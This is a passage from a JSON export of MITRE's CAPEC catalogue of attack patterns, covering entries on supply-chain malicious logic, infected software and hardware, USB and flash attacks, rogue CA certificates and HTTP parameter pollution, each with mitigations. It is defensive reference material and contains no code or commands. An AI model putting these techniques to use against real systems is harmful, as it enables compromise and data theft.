location."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"284"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity"}],"Previous_Entry_Name":["Malicious Logic Inserted Into to Product",{"Date":"2015-11-09"}]}},"442":{"ID":"442","Name":"Infected Software","Abstraction":"Standard","Status":"Stable","Description":"An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"441","Exclude_Related":[{"Exclude_ID":"515"},{"Exclude_ID":"437"}]}},"Prerequisites":{"Prerequisite":"Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Leverage anti-virus products to detect and quarantine software with known virus."},"References":{"Reference":{"External_Reference_ID":"REF-387"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Examples-Instances, References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Inserted Into Product Software",{"Date":"2015-11-09"},"Malicious Logic Inserted Into To Product Software",{"Date":"2018-07-31"}]}},"443":{"ID":"443","Name":"Malicious Logic Inserted Into Product Software by Authorized Developer","Abstraction":"Detailed","Status":"Stable","Description":"An adversary uses their privileged position within an authorized software development organization to inject malicious logic into a codebase or product. Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In other cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Access to the software during the development phase."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality."},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"444":{"ID":"444","Name":"Development Alteration","Abstraction":"Standard","Status":"Stable","Description":"An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system\'s software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. The product is then delivered to the user where the negative impact can be leveraged at a later time.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"438"}},"Prerequisites":{"Prerequisite":"Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":[{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Alter Execution Logic"}]},"Mitigations":{"Mitigation":"Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Software via Externally Manipulated Component",{"Date":"2015-11-09"}]}},"445":{"ID":"445","Name":"Malicious Logic Insertion into Product Software via Configuration Management Manipulation","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an adversary can control the elements included in a product\'s configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product\'s ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server. Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product\'s configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"Access to the configuration management system during deployment or currently deployed at a victim location. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":["Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.","Leverage anti-virus products to detect and quarantine software with known virus."]},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"446":{"ID":"446","Name":"Malicious Logic Insertion into Product Software via Inclusion of 3rd Party Component Dependency","Abstraction":"Detailed","Status":"Stable","Description":"An adversary conducts supply chain attacks by the inclusion of insecure 3rd party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer. The result is a window of opportunity for exploiting the product or software until the insecure component is discovered. This supply chain threat can result in the installation of software that introduces widespread security vulnerabilities within an organization. One example could be the inclusion of an exploitable DLL (Dynamic Link Library) included within an antivirus technology. Because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing COTS software that comes pre-packaged with the components required for it to operate.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"444","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"Access to the software during the development phase. This access is often obtained via insider access to include the 3rd party component after deployment."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality."},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"447":{"ID":"447","Name":"Design Alteration","Abstraction":"Standard","Status":"Stable","Description":"An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then developed and delivered to the user where the negative impact can be leveraged at a later time.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"438","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":["Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have.","Ability to forge web communications to deliver modified design documentation."]},"Consequences":{"Consequence":[{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":"Integrity","Impact":"Alter Execution Logic"}]},"Mitigations":{"Mitigation":["Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.","Ensure that design documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Software during Update",{"Date":"2015-11-09"}]}},"448":{"ID":"448","Name":"Embed Virus into DLL","Abstraction":"Detailed","Status":"Stable","Description":"An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"442","Exclude_Related":[{"Exclude_ID":"515"},{"Exclude_ID":"437"}]}},"Prerequisites":{"Prerequisite":"Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn\'t normally have."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Leverage anti-virus products to detect and quarantine software with known virus."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malware Infection into Product Software",{"Date":"2018-07-31"}]}},"452":{"ID":"452","Name":"Infected Hardware","Abstraction":"Standard","Status":"Stable","Description":"An adversary inserts malicious logic into hardware, typically in the form of a computer virus or rootkit. This logic is often hidden from the user of the hardware and works behind the scenes to achieve negative impacts. This pattern of attack focuses on hardware already fielded and used in operation as opposed to hardware that is still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"441","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":"Access to the hardware currently deployed at a victim location."},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Hardware",{"Date":"2018-07-31"}]}},"456":{"ID":"456","Name":"Infected Memory","Abstraction":"Standard","Status":"Stable","Description":"An adversary inserts malicious logic into memory enabling them to achieve a negative impact. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems that are still under development and part of the supply chain.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"441","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"437"}]}},"Consequences":{"Consequence":{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}},"Mitigations":{"Mitigation":"Leverage anti-virus products to detect stop operations with known virus."},"Example_Instances":{"Example":["A USB Memory stick has malicious logic inserted before shipping of the product allowing for infection of the host machine once inserted into the USB port.","In 2007, approximately 1800 of Seagate\'s Maxtor Personal Storage 3200 drives were built under contract with an outside manufacturer and contained a virus that stole user passwords."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, Examples-Instances, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}],"Previous_Entry_Name":["Malicious Logic Insertion into Product Memory",{"Date":"2018-07-31"}]}},"457":{"ID":"457","Name":"USB Memory Attacks","Abstraction":"Detailed","Status":"Draft","Description":"An adversary loads malicious code onto a USB memory stick in order to infect any system which the device is plugged in to. USB drives present a significant security risk for business and government agencies. Given the ability to integrate wireless functionality into a USB stick, it is possible to design malware that not only steals confidential data, but sniffs the network, or monitor keystrokes, and then exfiltrates the stolen data off-site via a Wireless connection. Also, viruses can be transmitted via the USB interface without the specific use of a memory stick. The attacks from USB devices are often of such sophistication that experts conclude they are not the work of single individuals, but suggest state sponsorship. These attacks can be performed by an adversary with direct access to a target system or can be executed via means such as USB Drop Attacks.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"456"},{"Nature":"CanPrecede","CAPEC_ID":"529"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine Target System] In certain cases, the adversary will explore an organization\'s network to determine a specific target machine to exploit based on the information it contains or privileges the main user may possess.","Technique":"If needed, the adversary explores an organization\'s network to determine if any specific systems of interest exist."},{"Step":"2","Phase":"Experiment","Description":"[Develop or Obtain malware and install on a USB device] The adversary develops or obtains the malicious software necessary to exploit the target system, which they then install on an external USB device such as a USB flash drive.","Technique":"The adversary can develop or obtain malware for to perform a variety of tasks such as sniffing network traffic or monitoring keystrokes."},{"Step":"3","Phase":"Exploit","Description":"[Connect or deceive a user into connecting the infected USB device] Once the malware has been placed on an external USB device, the adversary connects the device to the target system or deceives a user into connecting the device to the target system such as in a USB Drop Attack.","Technique":"The adversary connects the USB device to a specified target system or performs a USB Drop Attack, hoping a user will find and connect the USB device on their own. Once the device is connected, the malware executes giving the adversary access to network traffic, credentials, etc."}]},"Prerequisites":{"Prerequisite":["Some level of physical access to the device being attacked.","Information pertaining to the target organization on how to best execute a USB Drop Attack."]},"Mitigations":{"Mitigation":["Ensure that proper, physical system access is regulated to prevent an adversary from physically connecting a malicious USB device themself.","Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.","Do not connect untrusted USB devices to systems connected on an organizational network. Additionally, use an isolated testing machine to validate untrusted devices and confirm malware does not exist."]},"References":{"Reference":{"External_Reference_ID":"REF-379"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description, Description Summary, Related_Attack_Patterns, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Mitigations"}]}},"458":{"ID":"458","Name":"Flash Memory Attacks","Abstraction":"Detailed","Status":"Draft","Description":"An attacker inserts malicious logic into a product or technology via flashing the on-board memory with a code-base that contains malicious logic. Various attacks exist against the integrity of flash memory, the most direct being rootkits coded into the BIOS or chipset of a device. Such attacks are very difficult to detect because the malicious code resides outside the filesystem or RAM, and in the underlying byte-code that drives the processor. Many devices, such as the recent attacks against digital picture frames, contain only a microprocessor and a small amount of solid-state memory, rendering these devices ideal for \\"flash\\" based malware or malicious logic. One of the pernicious characteristics of flash memory based attacks is that the malicious code can survive even a total format of the hard-drive and reinstallation of the host operating system. Virtually any device which can be integrated into a computer system is susceptible to these attacks. Additionally, any peripheral device which interfaces with the computer bus could extract or sniff confidential data, even on systems employing full-disk encryption. Trojan code placed into a video card\'s chipset would continue to perform its function irrespective of the host operating system, and would be invisible to all known antivirus. The threats extend to consumer products such as camcorders, digital cameras, or any consumer electronic device with an embedded microcontroller.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"456"}},"References":{"Reference":[{"External_Reference_ID":"REF-379"},{"External_Reference_ID":"REF-394"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"}}},"459":{"ID":"459","Name":"Creating a Rogue Certification Authority Certificate","Abstraction":"Detailed","Status":"Draft","Description":"An adversary exploits a weakness resulting from using a hashing algorithm with weak collision resistance to generate certificate signing requests (CSR) that contain collision blocks in their \\"to be signed\\" parts. The adversary submits one CSR to be signed by a trusted certificate authority then uses the signed blob to make a second certificate appear signed by said certificate authority. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob works just as well in the second certificate. The net effect is that the adversary\'s second X.509 certificate, which the Certification Authority has never seen, is now signed and validated by that Certification Authority. Alternatively, the second certificate could be a signing certificate. Thus the adversary is able to start their own Certification Authority that is anchored in its root of trust in the legitimate Certification Authority that has signed the attacker\'s first X.509 certificate. If the original Certificate Authority was accepted by default by browsers, so will the Certificate Authority set up by the adversary and any certificates that it signs. As a result, the adversary is able to generate any SSL certificates to impersonate any web server, and the user\'s browser will not issue any warning to the victim. This can be used to compromise HTTPS communications and other types of systems where PKI and X.509 certificates may be used (e.g., VPN, IPSec).","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"473"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Exploit","Description":"The adversary crafts two different, but valid X.509 certificates that when hashed with an insufficiently collision resistant hashing algorithm would yield the same value."},{"Step":"2","Phase":"Exploit","Description":"The adversary sends the CSR for one of the certificates to the Certification Authority which uses the targeted hashing algorithm. That request is completely valid and the Certificate Authority issues an X.509 certificate to the adversary which is signed with its private key."},{"Step":"3","Phase":"Exploit","Description":"The adversary takes the signed blob and inserts it into the second X.509 certificate that the attacker generated. Due to the hash collision, both certificates, though different, hash to the same value and so the signed blob is valid in the second certificate. The result is two certificates that appear to be signed by a valid certificate authority despite only one having been signed."}]},"Prerequisites":{"Prerequisite":"Certification Authority is using a hash function with insufficient collision resistance to generate the certificate hash to be signed"},"Skills_Required":{"Skill":["Understanding of how to force a hash collision in X.509 certificates",{"Level":"High"},"An attacker must be able to craft two X.509 certificates that produce the same hash value",{"Level":"High"},"Knowledge needed to set up a certification authority",{"Level":"Medium"}]},"Resources_Required":{"Resource":["Knowledge of a certificate authority that uses hashing algorithms with poor collision resistance","A valid certificate request and a malicious certificate request with identical hash values"]},"Consequences":{"Consequence":{"Scope":["Access Control","Authentication"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"Certification Authorities need to stop using deprecated or cryptographically insecure hashing algorithms to hash the certificates that they are about to sign. Instead they should be using stronger hashing functions such as SHA-256 or SHA-512."},"Example_Instances":{"Example":[{"div":["MD5 Collisions",{"style":"color:#32498D; font-weight:bold;"}],"p":"The MD5 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities."},{"div":["SHA1 Collisions",{"style":"color:#32498D; font-weight:bold;"}],"p":"The SHA1 algorithm is not collision resistant, allowing attackers to use spoofing attacks to create rogue certificate Authorities."},{"div":["PKI Infrastructure vulnerabilities",{"style":"color:#32498D; font-weight:bold;"}],"p":"Research has show significant vulnerabilities in PKI infrastructure. Trusted certificate authorities have been shown to use weak hashing algorithms after attacks have been demonstrated against those algorithms. Additionally, reliable methods have been demonstrated for generated MD5 collisions that could be used to generate malicious CSRs."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"327"},{"CWE_ID":"295"},{"CWE_ID":"290"}]},"References":{"Reference":[{"External_Reference_ID":"REF-395"},{"External_Reference_ID":"REF-587"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Description, Example_Instances, Likelihood_Of_Attack, Mitigations, Prerequisites, References, Resources_Required, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}],"Previous_Entry_Name":["Creating a Rogue Certificate Authority Certificate",{"Date":"2017-05-01"}]}},"460":{"ID":"460","Name":"HTTP Parameter Pollution (HPP)","Abstraction":"Detailed","Status":"Draft","Description":"An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"15"},{"Nature":"CanPrecede","CAPEC_ID":"676"}]},"Prerequisites":{"Prerequisite":"HTTP protocol is used with some GET/POST parameters passed"},"Resources_Required":{"Resource":"Any tool that enables intercepting and tampering with HTTP requests"},"Mitigations":{"Mitigation":["Configuration: If using a Web Application Firewall (WAF), filters should be carefully configured to detect abnormal HTTP requests","Design: Perform URL encoding","Implementation: Use strict regular expressions in URL rewriting","Implementation: Beware of multiple occurrences of a parameter in a Query String"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"88"},{"CWE_ID":"147"},{"CWE_ID":"235"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Web Parameter Tampering"}},"References":{"Reference":[{"External_Reference_ID":"REF-397"},{"External_Reference_ID":"REF-606","Section":"Testing for HTTP Parameter Pollution"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"461":{"ID":"461","Name":"Web Services API Signature Forgery Leveraging Hash Function Extension Weakness","Abstraction":"Standard","Status":"Draft","Description":"When web services require callees to authenticate, they sometimes issue a token / secret to the caller that the caller is to use to sign their web service calls. In one such scheme the caller, when constructing a request, would concatenate all of the parameters passed to the web service with the provided authentication token and then generate a hash of the concatenated string (e.g., MD5, 